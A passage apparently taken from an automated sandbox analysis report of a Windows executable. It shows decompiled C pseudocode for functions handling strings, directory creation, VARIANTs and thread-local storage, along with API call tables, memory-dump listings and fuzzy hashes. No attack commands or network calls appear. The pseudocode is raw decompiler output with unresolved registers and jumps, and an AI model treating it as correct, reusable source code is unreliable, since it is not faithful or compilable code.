						return E0042569C(_v80, _t201, _v20 ^ _t233, _t211, _t216, _t225);
					} else {
						_t215 = _v88;
						__eflags = _t224 - _t215;
						if(__eflags == 0) {
							L88:
							_t211 = _v92;
							_push(_v92);
							E0040A3F2(_t200, _v92, _t215, _t224, __eflags);
							_t235 =  &(_t235[4]);
							_t142 = 0;
							__eflags = 0;
							goto L89;
						}
						_t226 = _t224 + 0x18;
						__eflags = _t226;
						do {
							__eflags =  *_t226 - 8;
							if(__eflags >= 0) {
								_push( *((intOrPtr*)(_t226 - 0x14)));
								E0040A3F2(_t200, _t211, _t215, _t226, __eflags);
								_t235 =  &(_t235[4]);
								_t142 = 0;
								__eflags = 0;
							}
							 *_t226 = 7;
							 *((intOrPtr*)(_t226 - 4)) = _t142;
							 *((short*)(_t226 - 0x14)) = _t142;
							_t226 = _t226 + 0x1c;
							__eflags = _t226 - 0x18 - _t215;
						} while (__eflags != 0);
						goto L88;
					}
				} else {
					if(_t247 > 0) {
						E00426095();
					}
					do {
						_t169 = _v72;
						if(_v52 < 8) {
							_t169 =  &_v72;
						}
						if( *((short*)(_t169 + _t199 * 2)) == 0x5c) {
							E00403FD0( &_v96,  &_v48);
							_t203 = (_t203 | 0xffffffff) - _v28;
							__eflags = _t203 - 1;
							if(__eflags <= 0) {
								E00439257(_t199, _t214,  &_v96, __eflags);
							}
							_t231 = _v28 + 1;
							__eflags = _t231 - 0x7ffffffe;
							if(__eflags > 0) {
								E00439257(_t199, _t214, _t231, __eflags);
							}
							_t172 = _v24;
							__eflags = _t172 - _t231;
							if(_t172 >= _t231) {
								__eflags = _t231;
								if(__eflags != 0) {
									goto L43;
								}
								goto L67;
							} else {
								_t211 = _v28;
								E00404550( &_v48, _t231, _t211);
								__eflags = _t231;
								L43:
								if(__eflags <= 0) {
									goto L50;
								}
								_t174 = _v44;
								_t203 = 8;
								__eflags = _v24 - 8;
								if(__eflags < 0) {
									_t174 =  &_v44;
								}
								_t211 = _v28;
								 *((short*)(_t174 + _t211 * 2)) = 0x5c;
								goto L47;
							}
						} else {
							if(_t199 > _v56) {
								E00426095();
							}
							_t181 = _v72;
							if(_v52 < 8) {
								_t181 =  &_v72;
							}
							_t214 =  *(_t181 + _t199 * 2) & 0x0000ffff;
							_t211 = (_t211 | 0xffffffff) - _v28;
							_t252 = _t211 - 1;
							if(_t211 <= 1) {
								E00439257(_t199, _t214, 8, _t252);
							}
							_t231 = _v28 + 1;
							_t253 = _t231 - 0x7ffffffe;
							if(_t231 > 0x7ffffffe) {
								E00439257(_t199, _t214, _t231, _t253);
							}
							_t172 = _v24;
							if(_t172 >= _t231) {
								__eflags = _t231;
								if(__eflags != 0) {
									goto L31;
								}
								L67:
								__eflags = _t172 - 8;
								_t176 = _v44;
								_v28 = 0;
								if(__eflags < 0) {
									_t176 =  &_v44;
								}
								 *_t176 = 0;
							} else {
								_t203 =  &_v48;
								E00404550(_t203, _t231, _v28);
								_t255 = _t231;
								L31:
								if(_t255 <= 0) {
									goto L50;
								}
								_t182 = _v44;
								_t203 = 8;
								if(_v24 < 8) {
									_t182 =  &_v44;
								}
								_t211 = _v28;
								 *(_t182 + _t211 * 2) = _t214;
								L47:
								_t175 = _v44;
								_v28 = _t231;
								if(_v24 < _t203) {
									_t175 =  &_v44;
								}
								 *((short*)(_t175 + _t231 * 2)) = 0;
							}
						}
						L50:
						_t199 = _t199 + 1;
					} while (_t199 < _v56);
					goto L51;
				}
			}

0x004025e0
0x004025e3
0x004025e5
0x004025f0
0x004025f1
0x004025f4
0x004025f9
0x004025fb
0x00402601
0x00402605
0x0040260b
0x0040260d
0x0040260f
0x00402616
0x00402619
0x0040261d
0x00402620
0x00402620
0x00402623
0x00402626
0x00402634
0x00402639
0x0040263c
0x0040263f
0x00402644
0x00402646
0x00402646
0x0040264b
0x00402656
0x00402658
0x00402658
0x00402660
0x00402668
0x0040266b
0x0040266d
0x0040266d
0x00402675
0x00402682
0x00402687
0x0040268a
0x0040268c
0x0040268c
0x0040268f
0x00402692
0x0040269b
0x0040269e
0x004026a1
0x004026a3
0x004026a3
0x004026a6
0x004026a6
0x00402682
0x004026ac
0x004026ae
0x004026b1
0x004026b4
0x004026b7
0x004026be
0x004026c1
0x004026c5
0x004026cc
0x004026ce
0x004026d1
0x004027f7
0x004027f7
0x004027fd
0x004027ff
0x004027ff
0x00402807
0x00402809
0x0040280c
0x0040280c
0x00402812
0x00402815
0x00402817
0x00402817
0x0040281c
0x00402820
0x00402829
0x0040282e
0x0040282e
0x00402832
0x00000000
0x00000000
0x00402840
0x00402843
0x00402845
0x00402845
0x0040284d
0x0040284f
0x0040284f
0x00402858
0x00402883
0x0040285a
0x0040285a
0x0040285a
0x00402888
0x004028d7
0x004028d7
0x004028d7
0x00000000
0x0040288a
0x00402891
0x00402899
0x00000000
0x00000000
0x0040289b
0x004028a0
0x004028a5
0x004028a9
0x004028d1
0x004028d4
0x00000000
0x004028d4
0x004028ab
0x004028ba
0x004028bd
0x004028c3
0x004028c8
0x004028ca
0x004028cc
0x004028d9
0x004028dc
0x004028e4
0x004028eb
0x004028ee
0x004028f0
0x004028f0
0x004028f5
0x00000000
0x004028f5
0x00402888
0x004028fd
0x00402901
0x00402905
0x0040290a
0x0040290b
0x00402910
0x00402913
0x00402913
0x00402913
0x00402915
0x00402919
0x0040291c
0x0040291e
0x00402925
0x00402928
0x0040292c
0x00402970
0x00402970
0x00402977
0x0040297b
0x0040297e
0x00402981
0x00402984
0x00402989
0x0040298a
0x0040298f
0x0040299b
0x004029a3
0x004029a4
0x004029a5
0x004029a9
0x004029b3
0x0040292e
0x0040292e
0x00402931
0x00402933
0x00402962
0x00402962
0x00402965
0x00402966
0x0040296b
0x0040296e
0x0040296e
0x00000000
0x0040296e
0x00402935
0x00402935
0x00402938
0x00402938
0x0040293b
0x00402940
0x00402941
0x00402946
0x00402949
0x00402949
0x00402949
0x0040294b
0x00402951
0x00402954
0x00402958
0x0040295e
0x0040295e
0x00000000
0x00402938
0x004026d7
0x004026d7
0x004026d9
0x004026d9
0x004026de
0x004026de
0x004026e9
0x004026eb
0x004026eb
0x004026f3
0x00402777
0x0040277f
0x00402782
0x00402785
0x00402787
0x00402787
0x0040278f
0x00402792
0x00402798
0x0040279a
0x0040279a
0x0040279f
0x004027a2
0x004027a4
0x0040285f
0x00402861
0x00000000
0x00000000
0x00000000
0x004027aa
0x004027aa
0x004027b3
0x004027b8
0x004027ba
0x004027ba
0x00000000
0x00000000
0x004027bc
0x004027bf
0x004027c4
0x004027c7
0x004027c9
0x004027c9
0x004027cc
0x004027cf
0x00000000
0x004027cf
0x004026f5
0x004026f8
0x004026fa
0x004026fa
0x00402702
0x00402705
0x00402707
0x00402707
0x0040270a
0x00402711
0x00402714
0x00402717
0x00402719
0x00402719
0x00402721
0x00402724
0x0040272a
0x0040272c
0x0040272c
0x00402731
0x00402736
0x00402767
0x00402769
0x00000000
0x00000000
0x00402867
0x00402867
0x0040286a
0x0040286d
0x00402874
0x00402876
0x00402876
0x00402879
0x00402738
0x0040273d
0x00402741
0x00402746
0x00402748
0x00402748
0x00000000
0x00000000
0x0040274e
0x00402751
0x00402759
0x0040275b
0x0040275b
0x0040275e
0x00402761
0x004027d5
0x004027d8
0x004027db
0x004027de
0x004027e0
0x004027e0
0x004027e3
0x004027e3
0x00402736
0x004027e9
0x004027ec
0x004027ef
0x00000000
0x004026de

APIs

std::_String_base::_Xlen.LIBCPMT ref: 0040266D
std::_String_base::_Xlen.LIBCPMT ref: 00402719
std::_String_base::_Xlen.LIBCPMT ref: 0040272C
std::_String_base::_Xlen.LIBCPMT ref: 00402787

Part of subcall function 00439257: __EH_prolog3.LIBCMT ref: 0043925E
Part of subcall function 00439257: __CxxThrowException@8.LIBCMT ref: 00439290

std::_String_base::_Xlen.LIBCPMT ref: 0040279A
lstrlenW.KERNEL32(00000002,?,?,765B253D), ref: 0040288B
__alloca_probe_16.LIBCMT ref: 004028A0
WideCharToMultiByte.KERNEL32(?,00000000,00000002,000000FF,?,?,00000000,00000000,?,?,765B253D), ref: 004028BD
CreateDirectoryA.KERNEL32(00000000,00000000,?,?,765B253D), ref: 004028DC

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: String_base::_Xlenstd::_$ByteCharCreateDirectoryException@8H_prolog3MultiThrowWide__alloca_probe_16lstrlen
String ID:
API String ID: 162299512-0
Opcode ID: 2680c50e2a22598539c4ecaa4948f3ee09b0872faf346bcbea79acd897608d04
Instruction ID: 6c3aabaa95c2ed9a07a0b726940fb06ed8fbb0d530e638e7903407dc94d2cf5a
Opcode Fuzzy Hash: 2680c50e2a22598539c4ecaa4948f3ee09b0872faf346bcbea79acd897608d04
Instruction Fuzzy Hash: D1C16D71D00219DBCF10EFA9CA88A9EF7B5BF04314F61462AE915B72C0D778AD44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00423109, Relevance: 13.8, APIs: 9, Instructions: 253
stringCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00423109(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t121;
				int _t122;
				CHAR* _t127;
				CHAR* _t135;
				CHAR* _t140;
				signed short* _t142;
				CHAR* _t144;
				CHAR* _t148;
				CHAR* _t151;
				signed int _t158;
				signed int _t169;
				CHAR* _t173;
				void* _t176;
				void* _t179;
				signed short _t181;
				signed int _t183;
				intOrPtr _t185;
				CHAR* _t188;
				int _t190;
				char* _t193;
				void* _t194;
				void* _t195;
				CHAR* _t196;
				char* _t198;
				void* _t199;
				long long _t204;

				_t199 = __eflags;
				_t185 = __edx;
				_push(0x50);
				E00427279(E0043B406, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t195 - 0x34)) = __ecx;
				E0040E6CB(_t195 - 0x30, _t199,  *((intOrPtr*)(__ecx + 0x1c)));
				_t173 =  *(_t195 + 8);
				_t121 = _t173[8];
				_t187 = 0;
				 *(_t195 - 4) = 0;
				 *(_t195 - 0x1d) = 0;
				 *(_t195 - 0x18) = _t121;
				if(_t121 == 0) {
					 *(_t195 - 0x18) = _t195 - 0x1d;
				}
				_t122 = lstrlenA( *(_t195 - 0x18));
				_t201 =  *(_t195 + 0xc) & 0x0000000c;
				_t190 = _t122;
				 *(_t195 - 0x28) = _t173[0x10];
				 *(_t195 - 0x24) = _t173[0xc] & 0x0000ffff;
				if(( *(_t195 + 0xc) & 0x0000000c) == 0) {
					L11:
					_t191 =  *(_t195 + 0x14);
					_t127 = E00405580(_t185, __eflags,  *(_t191 + 8) << 4);
					__eflags = _t127;
					_pop(_t176);
					if(_t127 != 0) {
						_t191 =  *(_t191 + 8);
						__eflags = _t191 - 0x7ffffff;
						if(_t191 > 0x7ffffff) {
							goto L12;
						}
						_t192 = _t191 << 4;
						E004299F0(_t191 << 4);
						 *(_t195 - 0x10) = _t196;
						 *(_t195 - 0x1c) = _t196;
						E004277B0(_t187,  *(_t195 - 0x1c), _t187, _t191 << 4);
						_t198 =  &(_t196[0xc]);
						_t187 = E00422902(_t176, _t187, _t192,  *(_t195 - 0x18),  *(_t195 - 0x24));
						_t49 = _t187 + 0x10; // 0x10
						_t191 = _t49;
						_t135 = E00405580(_t185, __eflags, _t49);
						__eflags = _t135;
						if(_t135 == 0) {
							L4:
							 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
							if( *(_t195 - 0x2c) == 0) {
								L7:
								L55:
								return E004272D5(_t173, _t187, _t191);
							}
							_push( *((intOrPtr*)(_t195 - 0x30)));
							_push(0);
							L6:
							E0040DF8F();
							goto L7;
						}
						E004299F0(_t191);
						 *(_t195 - 0x10) = _t198;
						_t173 = 0;
						_t193 = _t198;
						 *((intOrPtr*)(_t195 - 0x58)) = 0x43fb38;
						 *((intOrPtr*)(_t195 - 0x54)) = 0;
						 *((intOrPtr*)(_t195 - 0x48)) = 0;
						 *((intOrPtr*)(_t195 - 0x4c)) = 0;
						 *((intOrPtr*)(_t195 - 0x50)) = 0;
						_push(_t195 - 0x58);
						_push( *(_t195 - 0x1c));
						_push( *((intOrPtr*)(_t195 + 0x18)));
						 *(_t195 - 4) = 1;
						_push( *(_t195 + 0x14));
						_push( *(_t195 - 0x24));
						_push(_t195 - 0x44);
						_push( *(_t195 - 0x18));
						_push(_t193);
						_t140 = E00422E21(0,  *((intOrPtr*)(_t195 - 0x34)), _t187, _t193, __eflags);
						__eflags = _t140;
						 *(_t195 - 0x18) = _t140;
						if(_t140 != 0) {
							L26:
							_t191 =  *(_t195 + 0x14);
							_t187 = 0;
							__eflags =  *(_t191 + 8);
							if( *(_t191 + 8) <= 0) {
								L29:
								__eflags =  *(_t195 - 0x18);
								_t179 = _t195 - 0x58;
								if( *(_t195 - 0x18) == 0) {
									E00422CB3(_t179);
									_t142 =  *(_t195 + 0x10);
									__eflags = _t142;
									if(_t142 == 0) {
										_t144 = ( *(_t195 - 0x24) & 0x0000ffff) - 8;
										__eflags = _t144;
										if(_t144 == 0) {
											__imp__#6(_t173);
											L52:
											 *(_t195 - 4) = 0;
											E00422D09(_t195 - 0x58, _t185);
											 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
											__eflags =  *(_t195 - 0x2c);
											if( *(_t195 - 0x2c) != 0) {
												_push( *((intOrPtr*)(_t195 - 0x30)));
												_push(0);
												E0040DF8F();
											}
											__eflags = 0;
											goto L55;
										}
										_t148 = _t144 - 1;
										__eflags = _t148;
										if(_t148 == 0) {
											L48:
											__eflags = _t173;
											if(_t173 != 0) {
												 *((intOrPtr*)( *_t173 + 8))(_t173);
											}
											goto L52;
										}
										_t151 = _t148 - 3;
										__eflags = _t151;
										if(_t151 == 0) {
											__imp__#9(_t195 - 0x44);
											goto L52;
										}
										__eflags = _t151 != 1;
										if(_t151 != 1) {
											goto L52;
										}
										goto L48;
									}
									_t181 =  *(_t195 - 0x24);
									 *_t142 = _t181;
									_t183 = (_t181 & 0x0000ffff) + 0xfffffffe;
									__eflags = _t183 - 0x13;
									if(_t183 > 0x13) {
										goto L52;
									}
									switch( *((intOrPtr*)(_t183 * 4 +  &M00423419))) {
										case 0:
											L41:
											 *(__eax + 8) = __bx;
											goto L52;
										case 1:
											 *(__eax + 8) = __ebx;
											goto L52;
										case 2:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 3:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 4:
											__ecx =  *(__ebp - 0x44);
											 *(__eax + 8) =  *(__ebp - 0x44);
											__ecx =  *(__ebp - 0x40);
											 *(__eax + 0xc) = __ecx;
											goto L52;
										case 5:
											__bx =  ~__bx;
											asm("sbb ebx, ebx");
											goto L41;
										case 6:
											__esi = __ebp - 0x44;
											__edi = __eax;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											goto L52;
										case 7:
											goto L52;
										case 8:
											_t142[4] = _t173;
											goto L52;
									}
								}
								 *(_t195 - 4) = 0;
								E00422D09(_t179, _t185);
								 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
								__eflags =  *(_t195 - 0x2c);
								if( *(_t195 - 0x2c) != 0) {
									_push( *((intOrPtr*)(_t195 - 0x30)));
									_push(0);
									E0040DF8F();
								}
								goto L55;
							}
							do {
								__imp__#9( *(_t195 - 0x1c));
								 *(_t195 - 0x1c) =  &(( *(_t195 - 0x1c))[0x10]);
								_t187 = _t187 + 1;
								__eflags = _t187 -  *(_t191 + 8);
							} while (_t187 <  *(_t191 + 8));
							goto L29;
						}
						_t158 =  *(_t195 - 0x24) & 0x0000ffff;
						__eflags = _t158 - 4;
						_push(_t187);
						_push(_t193);
						_push( *(_t195 - 0x28));
						 *(_t195 - 4) = 2;
						if(_t158 == 4) {
							E004249AE();
							 *((intOrPtr*)(_t195 - 0x34)) = _t204;
							 *((intOrPtr*)(_t195 - 0x44)) =  *((intOrPtr*)(_t195 - 0x34));
							L25:
							 *(_t195 - 4) = 1;
							goto L26;
						}
						__eflags = _t158 - 5;
						if(_t158 == 5) {
							L23:
							E004249AE();
							 *((long long*)(_t195 - 0x44)) = _t204;
							goto L25;
						}
						__eflags = _t158 - 7;
						if(_t158 == 7) {
							goto L23;
						}
						__eflags = _t158 + 0xffffffec - 1;
						if(_t158 + 0xffffffec > 1) {
							_t173 = E004249AE();
						} else {
							 *((intOrPtr*)(_t195 - 0x44)) = E004249AE();
							 *((intOrPtr*)(_t195 - 0x40)) = _t185;
						}
						goto L25;
					}
					L12:
					 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
					__eflags =  *(_t195 - 0x2c) - _t187;
					if( *(_t195 - 0x2c) == _t187) {
						goto L7;
					}
					_push( *((intOrPtr*)(_t195 - 0x30)));
					_push(_t187);
					goto L6;
				}
				_t19 = _t190 + 3; // 0x3
				_t187 = _t19;
				if(E00405580(_t185, _t201, _t19) != 0) {
					E004299F0(_t187);
					 *(_t195 - 0x10) = _t196;
					_t188 = _t196;
					_t26 = _t190 + 3; // 0x3
					E0040B11E(_t173, _t195, _t188, _t26,  *(_t195 - 0x18), _t190);
					_t169 = _t173[0xc] & 0x0000ffff;
					_t196 =  &(_t196[0x10]);
					__eflags = _t169 - 8;
					 *(_t195 - 0x18) = _t188;
					if(_t169 == 8) {
						_t169 = 0xe;
					}
					 *(_t195 - 0x24) =  *(_t195 - 0x24) & 0x00000000;
					_t188[_t190] = 0xff;
					_t194 = _t190 + 1;
					_t188[_t194] = _t169;
					_t188[_t194 + 1] = 0;
					 *(_t195 - 0x28) = _t173[0x14];
					_t187 = 0;
					__eflags = 0;
					goto L11;
				}
				goto L4;
			}

0x00423109
0x00423109
0x00423109
0x00423110
0x00423115
0x0042311e
0x00423123
0x00423126
0x00423129
0x0042312d
0x00423130
0x00423134
0x00423137
0x0042313c
0x0042313c
0x00423142
0x00423148
0x0042314c
0x00423151
0x00423158
0x0042315b
0x004231cf
0x004231cf
0x004231d9
0x004231de
0x004231e0
0x004231e1
0x004231f2
0x004231f5
0x004231fb
0x00000000
0x00000000
0x004231fd
0x00423202
0x00423207
0x0042320a
0x00423212
0x00423217
0x00423225
0x00423227
0x00423227
0x0042322b
0x00423230
0x00423233
0x0042316b
0x0042316b
0x00423173
0x0042317f
0x0042340c
0x00423414
0x00423414
0x00423175
0x00423178
0x0042317a
0x0042317a
0x00000000
0x0042317a
0x0042323b
0x00423240
0x00423243
0x00423245
0x00423247
0x0042324e
0x00423251
0x00423254
0x00423257
0x00423260
0x00423261
0x00423267
0x0042326a
0x0042326e
0x00423271
0x00423274
0x00423275
0x00423278
0x00423279
0x0042327e
0x00423280
0x00423283
0x004232de
0x004232de
0x004232e1
0x004232e3
0x004232e6
0x00423301
0x00423301
0x00423305
0x00423308
0x00423355
0x0042335a
0x0042335d
0x0042335f
0x004233bb
0x004233bb
0x004233be
0x004233e4
0x004233ea
0x004233ed
0x004233f1
0x004233f6
0x004233fa
0x004233fe
0x00423400
0x00423403
0x00423405
0x00423405
0x0042340a
0x00000000
0x0042340a
0x004233c0
0x004233c0
0x004233c1
0x004233cb
0x004233cb
0x004233cd
0x004233d2
0x004233d2
0x00000000
0x004233cd
0x004233c3
0x004233c3
0x004233c6
0x004233db
0x00000000
0x004233db
0x004233c8
0x004233c9
0x00000000
0x00000000
0x00000000
0x004233c9
0x00423361
0x00423364
0x0042336a
0x0042336d
0x00423370
0x00000000
0x00000000
0x00423372
0x00000000
0x004233a1
0x004233a1
0x00000000
0x00000000
0x004233b2
0x00000000
0x00000000
0x0042338f
0x00000000
0x00000000
0x00423397
0x00000000
0x00000000
0x0042337e
0x00423381
0x00423384
0x00423387
0x00000000
0x00000000
0x0042339c
0x0042339f
0x00000000
0x00000000
0x004233a7
0x004233aa
0x004233ac
0x004233ad
0x004233ae
0x004233af
0x00000000
0x00000000
0x00000000
0x00000000
0x00423379
0x00000000
0x00000000
0x00423372
0x0042330a
0x0042330e
0x00423313
0x00423317
0x0042331b
0x0042331d
0x00423320
0x00423322
0x00423322
0x00000000
0x00423327
0x004232ee
0x004232f1
0x004232f7
0x004232fb
0x004232fc
0x004232fc
0x00000000
0x004232ee
0x00423285
0x00423289
0x0042328c
0x0042328d
0x0042328e
0x00423291
0x00423295
0x004232c9
0x004232ce
0x004232d4
0x004232d7
0x004232d7
0x00000000
0x004232d7
0x00423297
0x0042329a
0x004232bf
0x004232bf
0x004232c4
0x00000000
0x004232c4
0x0042329c
0x0042329f
0x00000000
0x00000000
0x004232a4
0x004232a7
0x004232bb
0x004232a9
0x004232ae
0x004232b1
0x004232b1
0x00000000
0x004232a7
0x004231e3
0x004231e3
0x004231e7
0x004231ea
0x00000000
0x00000000
0x004231ec
0x004231ef
0x00000000
0x004231ef
0x0042315d
0x0042315d
0x00423169
0x0042318b
0x00423190
0x00423193
0x00423199
0x0042319e
0x004231a3
0x004231a7
0x004231aa
0x004231ae
0x004231b1
0x004231b5
0x004231b5
0x004231b6
0x004231ba
0x004231be
0x004231bf
0x004231c2
0x004231ca
0x004231cd
0x004231cd
0x00000000
0x004231cd
0x00000000

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00423110
lstrlenA.KERNEL32(00000000,000000FF,00000050,0041755D,00000000,00000001,?,?,000000FF,?,?,?), ref: 00423142
__alloca_probe_16.LIBCMT ref: 0042318B

Part of subcall function 0040B11E: _memcpy_s.LIBCMT ref: 0040B12E

__alloca_probe_16.LIBCMT ref: 00423202
_memset.LIBCMT ref: 00423212
__alloca_probe_16.LIBCMT ref: 0042323B
VariantClear.OLEAUT32(?), ref: 004232F1

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: __alloca_probe_16$ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
String ID:
API String ID: 2586305615-0
Opcode ID: 68e3ec1e17bd010a137a8a8cbc4be135e49029e85f7d48c8b5e2552df9817b1f
Instruction ID: cee96bfb73986718a447d5758efde8c468f9b8f637a738395eafa8223aaac4d5
Opcode Fuzzy Hash: 68e3ec1e17bd010a137a8a8cbc4be135e49029e85f7d48c8b5e2552df9817b1f
Instruction Fuzzy Hash: B7A19E31E00229DBCF11DFA5E8856AEBBB0FF04315FA4415AE851A7291C73D9F42CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004170C0, Relevance: 13.6, APIs: 9, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E004170C0(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E0042720D(E0043A700, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					_push(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E00416D73(0x10);
						if(_t39 == 0) {
							_t65 = 0;
						} else {
							 *_t39 = 0x43f088;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E00416E8F( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							if( *(_t65 + 0xc) != 0) {
								_t41 = E00405670(_t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E00405670(_t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E00415804(_t53);
							}
							 *(_t65 + 0xc) = _t42;
							E004277B0(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					_push( *(_t66 - 0x14));
				}
				LeaveCriticalSection();
				return E004272B2(_t36);
			}

0x004170c0
0x004170c7
0x004170cc
0x004170ce
0x004170d1
0x004170d5
0x004170d8
0x004170de
0x004170e5
0x004171e6
0x004170f4
0x004170fc
0x00417100
0x00417134
0x00417137
0x0041713e
0x0041714a
0x00417140
0x00417140
0x00417146
0x00417146
0x0041714c
0x00417154
0x00417157
0x0041715a
0x00000000
0x00417102
0x00417102
0x00417108
0x00417117
0x0041711a
0x0041717e
0x00417184
0x00417189
0x0041711c
0x00417121
0x00417127
0x0041712a
0x0041712a
0x00417191
0x00417196
0x0041719c
0x0041719c
0x004171a4
0x004171b5
0x004171c1
0x004171c6
0x004171cc
0x004171cc
0x00417108
0x004171cf
0x004171d4
0x004171de
0x004171de
0x004171e1
0x004171e1
0x004171e7
0x004171f2

APIs

__EH_prolog3_catch.LIBCMT ref: 004170C7
EnterCriticalSection.KERNEL32(?,00000010,0041728B,?,00000000,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 004170D8
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 004170F6
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 0041712A
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 00417196
_memset.LIBCMT ref: 004171B5
TlsSetValue.KERNEL32(?,00000000,00000000,765B253D), ref: 004171C6
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 004171E7

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: 8b013b585f50a51322844018a7a8ee25958da09f41398ad72ac55dfa406c0ebf
Instruction ID: 920cc480fe0bab0eee336b10c92a0cd846a855f28dda31a9b11ff9cc248209af
Opcode Fuzzy Hash: 8b013b585f50a51322844018a7a8ee25958da09f41398ad72ac55dfa406c0ebf
Instruction Fuzzy Hash: 1F31AF71A04605BFDB20AF50D885CAABBB5FF04324B10C62FE55696660CB38AD90CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0041AF08, Relevance: 12.3, APIs: 8, Instructions: 297
memoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0041AF08(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t114;
				intOrPtr _t118;
				intOrPtr* _t119;
				void* _t120;
				intOrPtr* _t121;
				void* _t122;
				intOrPtr* _t125;
				intOrPtr* _t127;
				void _t129;
				intOrPtr* _t131;
				long _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void _t139;
				void _t141;
				void* _t143;
				void* _t144;
				void* _t147;
				void* _t148;
				void _t149;
				void* _t151;
				intOrPtr* _t153;
				void* _t154;
				void _t158;
				void* _t159;
				void _t161;
				intOrPtr* _t163;
				void* _t168;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr* _t174;
				void* _t175;
				intOrPtr _t186;
